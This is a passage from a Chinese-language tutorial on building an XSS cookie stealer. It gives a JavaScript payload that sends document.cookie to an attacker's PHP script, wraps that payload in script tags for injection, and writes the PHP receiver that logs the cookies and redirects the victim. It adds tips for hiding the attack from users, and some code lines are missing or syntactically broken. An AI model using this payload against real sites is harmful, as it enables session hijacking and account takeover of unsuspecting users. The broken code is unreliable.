说明我们成功地为这个页面设置了"username=Null Byte" 的cookie。
Step 3: 用js脚本窃取Cookies
我们用来传递cookies到服务器的js字符串使用了document.cookie参数,但是我们用的是document.location中定义的url。
document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;
在本例中,PHP文件定位到localhost(127.0.0.1)。
如果目标是社交媒体网站,脚本需要注入到该站点中,窃取的cookies要发送给黑客控制的IP或URL。
把js代码吓到<script>标签中:
<script type="text/javascript"> document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie; </script>
HTML页面代码应该是下面这样:
剩下对cookie进行处理的部分需要PHP来处理。
Step 4: 用PHP处理Cookies
在上面的例子中,窃取cookie的PHP文件是cookiestealer.php,位于127.0.0.1网址下。
在实际运行中,不能用cookiestealer.php这么明显的名字,而且应该位于外部IP或URL下。
首先,在index.html相同目录下创新PHP文件。
nano cookiestealer.php
第一个元素需要定义的是重定向页面跳转。
<?php
header ('Location:https://google.com');
?>
为了不让用户意识到可能遭到攻击,最好重定向用户到相同域下的其他页面,这样用户就不会意识到。
重定向完成后,需要其他代码来处理cookie。
1. 分配cookie到一个变量;
$cookies = $_GET"c";
2. 定义保存cookie的文件,这个文件保存的位置应该是我们控制的。
本例中,文件名为log.txt。
$file = fopen('log.txt', 'a');
3. 把上面的两个参数的内容写入log文件,即将cookie写入log.txt。
fwrite($file, $cookies . "nn");
代码如下:
然后,需要准备PHP文件的测试环境。
Step 5: 测试Cookie Stealer
在index.html 和 cookiestealer.php相同目录下,搭建一个测试用的PHP环境。
php -S 127.0.0.1:80